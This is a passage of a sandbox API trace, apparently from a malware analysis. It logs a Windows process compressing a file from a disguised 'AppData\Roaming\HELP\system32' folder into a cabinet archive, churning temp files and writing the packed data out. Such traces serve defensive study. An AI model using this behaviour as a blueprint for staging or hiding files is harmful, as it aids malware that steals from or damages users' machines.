lpTempFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~fgF7F5.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\~fgf7f5.tmp")) returned 0xf7f5 [0066.679] LoadLibraryA (lpLibFileName="CABINET") returned 0x72dc0000 [0066.721] GetProcAddress (hModule=0x72dc0000, lpProcName="FCICreate") returned 0x72dc8e91 [0066.722] GetProcAddress (hModule=0x72dc0000, lpProcName="FCIAddFile") returned 0x72dc8cd4 [0066.722] GetProcAddress (hModule=0x72dc0000, lpProcName="FCIFlushCabinet") returned 0x72dc8db8 [0066.722] GetProcAddress (hModule=0x72dc0000, lpProcName="FCIFlushFolder") returned 0x72dc8e16 [0066.722] GetProcAddress (hModule=0x72dc0000, lpProcName="FCIDestroy") returned 0x72dc8e46 [0066.722] GetProcAddress (hModule=0x72dc0000, lpProcName="FDICreate") returned 0x72dc1c3f [0066.722] GetProcAddress (hModule=0x72dc0000, lpProcName="FDIIsCabinet") returned 0x72dc59bd [0066.722] GetProcAddress (hModule=0x72dc0000, lpProcName="FDICopy") returned 0x72dc1849 [0066.722] GetProcAddress (hModule=0x72dc0000, lpProcName="FDIDestroy") returned 0x72dc1693 [0066.722] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\mskfp32.ocx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0066.722] CloseHandle (hObject=0x140) returned 1 [0066.723] FCICreate () returned 0x300d78 [0066.723] GetLastError () returned 0x0 [0066.723] SetLastError (dwErrCode=0x0) [0066.723] GetLastError () returned 0x0 [0066.723] SetLastError (dwErrCode=0x0) [0066.723] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0066.723] GetLastError () returned 0x0 [0066.723] SetLastError (dwErrCode=0x0) [0066.723] GetLastError () returned 0x0 [0066.723] SetLastError (dwErrCode=0x0) [0066.723] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx2" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx2")) returned 0xffffffff [0066.723] GetLastError () returned 0x2 [0066.724] GetLastError () returned 0x2 [0066.724] SetLastError (dwErrCode=0x2) [0066.724] GetLastError () returned 0x2 [0066.724] SetLastError (dwErrCode=0x2) [0066.724] GetLastError () returned 0x2 [0066.724] SetLastError (dwErrCode=0x2) [0066.724] GetLastError () returned 0x2 [0066.724] SetLastError (dwErrCode=0x2) [0066.724] GetLastError () returned 0x2 [0066.724] SetLastError (dwErrCode=0x2) [0066.724] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx2" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5b0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0066.725] GetFileType (hFile=0x140) returned 0x1 [0066.725] GetLastError () returned 0x0 [0066.725] SetLastError (dwErrCode=0x0) [0066.725] GetLastError () returned 0x0 [0066.725] SetLastError (dwErrCode=0x0) [0066.725] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0066.725] GetLastError () returned 0x0 [0066.725] SetLastError (dwErrCode=0x0) [0066.725] GetLastError () returned 0x0 [0066.725] SetLastError (dwErrCode=0x0) [0066.725] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx3" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx3")) returned 0xffffffff [0066.725] GetLastError () returned 0x2 [0066.725] GetLastError () returned 0x2 [0066.725] SetLastError (dwErrCode=0x2) [0066.725] GetLastError () returned 0x2 [0066.725] SetLastError (dwErrCode=0x2) [0066.725] GetLastError () returned 0x2 [0066.725] SetLastError (dwErrCode=0x2) [0066.725] GetLastError () returned 0x2 [0066.725] SetLastError (dwErrCode=0x2) [0066.725] GetLastError () returned 0x2 [0066.725] SetLastError (dwErrCode=0x2) [0066.726] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx3" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5b0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0066.726] GetFileType (hFile=0x14c) returned 0x1 [0066.726] GetLastError () returned 0x0 [0066.726] SetLastError (dwErrCode=0x0) [0066.726] GetLastError () returned 0x0 [0066.726] SetLastError (dwErrCode=0x0) [0066.728] GetLastError () returned 0x0 [0066.728] SetLastError (dwErrCode=0x0) [0066.728] GetLastError () returned 0x0 [0066.728] SetLastError (dwErrCode=0x0) [0066.728] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx4" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx4")) returned 0xffffffff [0066.728] GetLastError () returned 0x2 [0066.728] GetLastError () returned 0x2 [0066.728] SetLastError (dwErrCode=0x2) [0066.728] GetLastError () returned 0x2 [0066.728] SetLastError (dwErrCode=0x2) [0066.728] GetLastError () returned 0x2 [0066.728] SetLastError (dwErrCode=0x2) [0066.728] GetLastError () returned 0x2 [0066.728] SetLastError (dwErrCode=0x2) [0066.728] GetLastError () returned 0x2 [0066.728] SetLastError (dwErrCode=0x2) [0066.728] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx4" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5ac, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0066.729] GetFileType (hFile=0x150) returned 0x1 [0066.729] GetLastError () returned 0x0 [0066.729] SetLastError (dwErrCode=0x0) [0066.729] GetLastError () returned 0x0 [0066.729] SetLastError (dwErrCode=0x0) [0066.729] GetLastError () returned 0x0 [0066.729] SetLastError (dwErrCode=0x0) [0066.729] GetLastError () returned 0x0 [0066.729] SetLastError (dwErrCode=0x0) [0066.729] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx5" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx5")) returned 0xffffffff [0066.729] GetLastError () returned 0x2 [0066.729] GetLastError () returned 0x2 [0066.729] SetLastError (dwErrCode=0x2) [0066.729] GetLastError () returned 0x2 [0066.729] SetLastError (dwErrCode=0x2) [0066.730] GetLastError () returned 0x2 [0066.730] SetLastError (dwErrCode=0x2) [0066.730] GetLastError () returned 0x2 [0066.730] SetLastError (dwErrCode=0x2) [0066.730] GetLastError () returned 0x2 [0066.730] SetLastError (dwErrCode=0x2) [0066.730] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx5" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx5"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5ac, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.730] GetFileType (hFile=0x154) returned 0x1 [0066.730] GetLastError () returned 0x0 [0066.731] SetLastError (dwErrCode=0x0) [0066.731] GetLastError () returned 0x0 [0066.731] SetLastError (dwErrCode=0x0) [0066.731] GetLastError () returned 0x0 [0066.731] SetLastError (dwErrCode=0x0) [0066.731] GetLastError () returned 0x0 [0066.731] SetLastError (dwErrCode=0x0) [0066.731] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx6" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx6")) returned 0xffffffff [0066.731] GetLastError () returned 0x2 [0066.731] GetLastError () returned 0x2 [0066.731] SetLastError (dwErrCode=0x2) [0066.731] GetLastError () returned 0x2 [0066.731] SetLastError (dwErrCode=0x2) [0066.731] GetLastError () returned 0x2 [0066.731] SetLastError (dwErrCode=0x2) [0066.731] GetLastError () returned 0x2 [0066.731] SetLastError (dwErrCode=0x2) [0066.731] GetLastError () returned 0x2 [0066.731] SetLastError (dwErrCode=0x2) [0066.731] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx6" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx6"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5ac, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0066.732] GetFileType (hFile=0x158) returned 0x1 [0066.732] FCIAddFile () returned 0x1 [0066.735] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\mskfp32.ocx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x15c [0066.735] GetFileInformationByHandle (in: hFile=0x15c, lpFileInformation=0x172d684 | out: lpFileInformation=0x172d684) returned 1 [0066.735] FileTimeToLocalFileTime (in: lpFileTime=0x172d698, lpLocalFileTime=0x172d67c | out: lpLocalFileTime=0x172d67c) returned 1 [0066.735] FileTimeToDosDateTime (in: lpFileTime=0x172d67c, lpFatDate=0x172d6ee, lpFatTime=0x172d6f0 | out: lpFatDate=0x172d6ee, lpFatTime=0x172d6f0) returned 1 [0066.735] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\mskfp32.ocx")) returned 0x2020 [0066.735] CloseHandle (hObject=0x15c) returned 1 [0066.735] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\mskfp32.ocx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x172d5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0066.735] GetFileType (hFile=0x15c) returned 0x1 [0066.735] ReadFile (in: hFile=0x15c, lpBuffer=0x17701a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x172d648, lpOverlapped=0x0 | out: lpBuffer=0x17701a8*, lpNumberOfBytesRead=0x172d648*=0xd9a, lpOverlapped=0x0) returned 1 [0066.737] GetLastError () returned 0x0 [0066.737] SetLastError (dwErrCode=0x0) [0066.737] ReadFile (in: hFile=0x15c, lpBuffer=0x1770f42, nNumberOfBytesToRead=0x7266, lpNumberOfBytesRead=0x172d648, lpOverlapped=0x0 | out: lpBuffer=0x1770f42*, lpNumberOfBytesRead=0x172d648*=0x0, lpOverlapped=0x0) returned 1 [0066.737] GetLastError () returned 0x0 [0066.737] SetLastError (dwErrCode=0x0) [0066.737] CloseHandle (hObject=0x15c) returned 1 [0066.739] FCIFlushCabinet () returned 0x1 [0066.742] GetLastError () returned 0x0 [0066.742] SetLastError (dwErrCode=0x0) [0066.742] GetLastError () returned 0x0 [0066.742] SetLastError (dwErrCode=0x0) [0066.742] GetLastError () returned 0x0 [0066.742] SetLastError (dwErrCode=0x0) [0066.742] GetLastError () returned 0x0 [0066.742] SetLastError (dwErrCode=0x0) [0066.742] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx7" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx7")) returned 0xffffffff [0066.742] GetLastError () returned 0x2 [0066.742] GetLastError () returned 0x2 [0066.742] SetLastError (dwErrCode=0x2) [0066.742] GetLastError () returned 0x2 [0066.742] SetLastError (dwErrCode=0x2) [0066.742] GetLastError () returned 0x2 [0066.742] SetLastError (dwErrCode=0x2) [0066.742] GetLastError () returned 0x2 [0066.742] SetLastError (dwErrCode=0x2) [0066.742] GetLastError () returned 0x2 [0066.743] SetLastError (dwErrCode=0x2) [0066.743] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx7" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx7"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d39c, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0066.743] GetFileType (hFile=0x15c) returned 0x1 [0066.743] GetLastError () returned 0x0 [0066.743] SetLastError (dwErrCode=0x0) [0066.743] GetLastError () returned 0x0 [0066.743] SetLastError (dwErrCode=0x0) [0066.743] GetLastError () returned 0x0 [0066.743] SetLastError (dwErrCode=0x0) [0066.743] GetLastError () returned 0x0 [0066.743] SetLastError (dwErrCode=0x0) [0066.744] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx8" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx8")) returned 0xffffffff [0066.744] GetLastError () returned 0x2 [0066.744] GetLastError () returned 0x2 [0066.744] SetLastError (dwErrCode=0x2) [0066.744] GetLastError () returned 0x2 [0066.744] SetLastError (dwErrCode=0x2) [0066.744] GetLastError () returned 0x2 [0066.744] SetLastError (dwErrCode=0x2) [0066.744] GetLastError () returned 0x2 [0066.744] SetLastError (dwErrCode=0x2) [0066.744] GetLastError () returned 0x2 [0066.744] SetLastError (dwErrCode=0x2) [0066.744] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx8" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx8"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d39c, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0066.744] GetFileType (hFile=0x160) returned 0x1 [0066.744] ReadFile (in: hFile=0x140, lpBuffer=0x300db8, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x172d3f4, lpOverlapped=0x0 | out: lpBuffer=0x300db8*, lpNumberOfBytesRead=0x172d3f4*=0x8, lpOverlapped=0x0) returned 1 [0066.744] ReadFile (in: hFile=0x140, lpBuffer=0x1768190, nNumberOfBytesToRead=0x95e, lpNumberOfBytesRead=0x172d3f4, lpOverlapped=0x0 | out: lpBuffer=0x1768190*, lpNumberOfBytesRead=0x172d3f4*=0x95e, lpOverlapped=0x0) returned 1 [0066.746] ReadFile (in: hFile=0x140, lpBuffer=0x300db8, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x172d3f4, lpOverlapped=0x0 | out: lpBuffer=0x300db8*, lpNumberOfBytesRead=0x172d3f4*=0x0, lpOverlapped=0x0) returned 1 [0066.746] GetLastError () returned 0x0 [0066.746] SetLastError (dwErrCode=0x0) [0066.746] ReadFile (in: hFile=0x14c, lpBuffer=0x303fa0, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x172d3fc, lpOverlapped=0x0 | out: lpBuffer=0x303fa0*, lpNumberOfBytesRead=0x172d3fc*=0x10, lpOverlapped=0x0) returned 1 [0066.747] ReadFile (in: hFile=0x14c, lpBuffer=0x3040c6, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x172d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3040c6*, lpNumberOfBytesRead=0x172d3b8*=0xc, lpOverlapped=0x0) returned 1 [0066.747] GetLastError () returned 0x0 [0066.747] SetLastError (dwErrCode=0x0) [0066.748] ReadFile (in: hFile=0x14c, lpBuffer=0x303fa0, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x172d3fc, lpOverlapped=0x0 | out: lpBuffer=0x303fa0*, lpNumberOfBytesRead=0x172d3fc*=0x0, lpOverlapped=0x0) returned 1 [0066.748] GetLastError () returned 0x0 [0066.748] SetLastError (dwErrCode=0x0) [0066.748] CloseHandle (hObject=0x140) returned 1 [0066.748] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx2" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx2")) returned 1 [0066.749] CloseHandle (hObject=0x14c) returned 1 [0066.750] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx3" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx3")) returned 1 [0066.751] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~fgF7F5.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\~fgf7f5.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d510, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0066.751] GetFileType (hFile=0x14c) returned 0x1 [0066.754] ReadFile (in: hFile=0x158, lpBuffer=0x300db8, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x172d554, lpOverlapped=0x0 | out: lpBuffer=0x300db8*, lpNumberOfBytesRead=0x172d554*=0x8, lpOverlapped=0x0) returned 1 [0066.754] ReadFile (in: hFile=0x158, lpBuffer=0x300db8, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x172d554, lpOverlapped=0x0 | out: lpBuffer=0x300db8*, lpNumberOfBytesRead=0x172d554*=0x0, lpOverlapped=0x0) returned 1 [0066.754] GetLastError () returned 0xb7 [0066.754] SetLastError (dwErrCode=0xb7) [0066.755] ReadFile (in: hFile=0x154, lpBuffer=0x17781b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x172d51c, lpOverlapped=0x0 | out: lpBuffer=0x17781b0*, lpNumberOfBytesRead=0x172d51c*=0x1c, lpOverlapped=0x0) returned 1 [0066.755] GetLastError () returned 0xb7 [0066.755] SetLastError (dwErrCode=0xb7) [0066.755] ReadFile (in: hFile=0x154, lpBuffer=0x17781b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x172d51c, lpOverlapped=0x0 | out: lpBuffer=0x17781b0*, lpNumberOfBytesRead=0x172d51c*=0x0, lpOverlapped=0x0) returned 1 [0066.755] GetLastError () returned 0xb7 [0066.755] SetLastError (dwErrCode=0xb7) [0066.755] ReadFile (in: hFile=0x150, lpBuffer=0x17781b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x172d51c, lpOverlapped=0x0 | out: lpBuffer=0x17781b0*, lpNumberOfBytesRead=0x172d51c*=0x966, lpOverlapped=0x0) returned 1 [0066.755] GetLastError () returned 0xb7 [0066.755] SetLastError (dwErrCode=0xb7) [0066.755] ReadFile (in: hFile=0x150, lpBuffer=0x17781b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x172d51c, lpOverlapped=0x0 | out: lpBuffer=0x17781b0*, lpNumberOfBytesRead=0x172d51c*=0x0, lpOverlapped=0x0) returned 1 [0066.755] GetLastError () returned 0xb7 [0066.755] SetLastError (dwErrCode=0xb7) [0066.756] CloseHandle (hObject=0x14c) returned 1 [0066.756] CloseHandle (hObject=0x150) returned 1 [0066.756] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx4" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx4")) returned 1 [0066.757] CloseHandle (hObject=0x154) returned 1 [0066.757] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx5" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx5")) returned 1 [0066.758] CloseHandle (hObject=0x158) returned 1 [0066.759] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx6" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx6")) returned 1 [0066.760] GetLastError () returned 0xb7 [0066.760] SetLastError (dwErrCode=0xb7) [0066.760] GetLastError () returned 0xb7 [0066.760] SetLastError (dwErrCode=0xb7) [0066.760] GetLastError () returned 0xb7 [0066.760] SetLastError (dwErrCode=0xb7) [0066.760] GetLastError () returned 0xb7 [0066.760] SetLastError (dwErrCode=0xb7) [0066.760] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx9" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx9")) returned 0xffffffff [0066.760] GetLastError () returned 0x2 [0066.760] GetLastError () returned 0x2 [0066.760] SetLastError (dwErrCode=0x2) [0066.760] GetLastError () returned 0x2 [0066.760] SetLastError (dwErrCode=0x2) [0066.760] GetLastError () returned 0x2 [0066.760] SetLastError (dwErrCode=0x2) [0066.760] GetLastError () returned 0x2 [0066.760] SetLastError (dwErrCode=0x2) [0066.760] GetLastError () returned 0x2 [0066.760] SetLastError (dwErrCode=0x2) [0066.760] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx9" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx9"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d4d0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0066.761] GetFileType (hFile=0x158) returned 0x1 [0066.761] GetLastError () returned 0x0 [0066.761] SetLastError (dwErrCode=0x0) [0066.761] GetLastError () returned 0x0 [0066.761] SetLastError (dwErrCode=0x0) [0066.761] GetLastError () returned 0x0 [0066.761] SetLastError (dwErrCode=0x0) [0066.761] GetLastError () returned 0x0 [0066.761] SetLastError (dwErrCode=0x0) [0066.761] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx10" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx10")) returned 0xffffffff [0066.761] GetLastError () returned 0x2 [0066.761] GetLastError () returned 0x2 [0066.761] SetLastError (dwErrCode=0x2) [0066.761] GetLastError () returned 0x2 [0066.761] SetLastError (dwErrCode=0x2) [0066.761] GetLastError () returned 0x2 [0066.761] SetLastError (dwErrCode=0x2) [0066.761] GetLastError () returned 0x2 [0066.761] SetLastError (dwErrCode=0x2) [0066.761] GetLastError () returned 0x2 [0066.761] SetLastError (dwErrCode=0x2) [0066.762] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx10" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx10"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d4d0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.762] GetFileType (hFile=0x154) returned 0x1 [0066.762] GetLastError () returned 0x0 [0066.762] SetLastError (dwErrCode=0x0) [0066.762] GetLastError () returned 0x0 [0066.762] SetLastError (dwErrCode=0x0) [0066.762] GetLastError () returned 0x0 [0066.762] SetLastError (dwErrCode=0x0) [0066.762] GetLastError () returned 0x0 [0066.762] SetLastError (dwErrCode=0x0) [0066.762] GetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx11" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx11")) returned 0xffffffff [0066.762] GetLastError () returned 0x2 [0066.762] GetLastError () returned 0x2 [0066.762] SetLastError (dwErrCode=0x2) [0066.762] GetLastError () returned 0x2 [0066.762] SetLastError (dwErrCode=0x2) [0066.762] GetLastError () returned 0x2 [0066.762] SetLastError (dwErrCode=0x2) [0066.762] GetLastError () returned 0x2 [0066.762] SetLastError (dwErrCode=0x2) [0066.763] GetLastError () returned 0x2 [0066.763] SetLastError (dwErrCode=0x2) [0066.763] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx11" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx11"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172d4d0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0066.763] GetFileType (hFile=0x150) returned 0x1 [0066.763] FCIDestroy () returned 0x1 [0066.764] CloseHandle (hObject=0x15c) returned 1 [0066.764] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx7" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx7")) returned 1 [0066.765] CloseHandle (hObject=0x160) returned 1 [0066.765] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx8" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx8")) returned 1 [0066.765] CloseHandle (hObject=0x158) returned 1 [0066.765] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx9" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx9")) returned 1 [0066.765] CloseHandle (hObject=0x154) returned 1 [0066.765] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx10" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx10")) returned 1 [0066.766] CloseHandle (hObject=0x150) returned 1 [0066.766] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx11" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx11")) returned 1 [0066.766] FreeLibrary (hLibModule=0x72dc0000) returned 1 [0066.767] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~fgF7F5.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\~fgf7f5.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0066.767] GetFileSize (in: hFile=0x150, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9ae [0066.767] CreateFileMappingA (hFile=0x150, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x154 [0066.767] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2c0000 [0066.768] SetFilePointer (in: hFile=0x144, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.768] GetFileSize (in: hFile=0x144, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0066.768] WriteFile (in: hFile=0x144, lpBuffer=0x172dae8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x172dae4, lpOverlapped=0x0 | out: lpBuffer=0x172dae8*, lpNumberOfBytesWritten=0x172dae4*=0x10, lpOverlapped=0x0) returned 1 [0066.769] WriteFile (in: hFile=0x144, lpBuffer=0x172db14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x172db0c, lpOverlapped=0x0 | out: lpBuffer=0x172db14*, lpNumberOfBytesWritten=0x172db0c*=0x4, lpOverlapped=0x0) returned 1 [0066.769] WriteFile (in: hFile=0x144, lpBuffer=0x172db1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x172db0c, lpOverlapped=0x0 | out: lpBuffer=0x172db1c*, lpNumberOfBytesWritten=0x172db0c*=0x4, lpOverlapped=0x0) returned 1 [0066.769] WriteFile (in: hFile=0x144, lpBuffer=0x2c0000*, nNumberOfBytesToWrite=0x9ae, lpNumberOfBytesWritten=0x172daf4, lpOverlapped=0x0 | out: lpBuffer=0x2c0000*, lpNumberOfBytesWritten=0x172daf4*=0x9ae, lpOverlapped=0x0) returned 1 [0066.769] UnmapViewOfFile (lpBaseAddress=0x2c0000) returned 1 [0066.769] CloseHandle (hObject=0x154) returned 1 [0066.770] CloseHandle (hObject=0x150) returned 1 [0066.770] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~fgF7F5.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\~fgf7f5.tmp")) returned 1 [0066.771] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172baf8, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0066.771] GetFileType (hFile=0x150) returned 0x1 [0066.771] GetLastError () returned 0xb7 [0066.771] SetLastError (dwErrCode=0xb7) [0066.771] CloseHandle (hObject=0x150) returned 1 [0066.771] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), 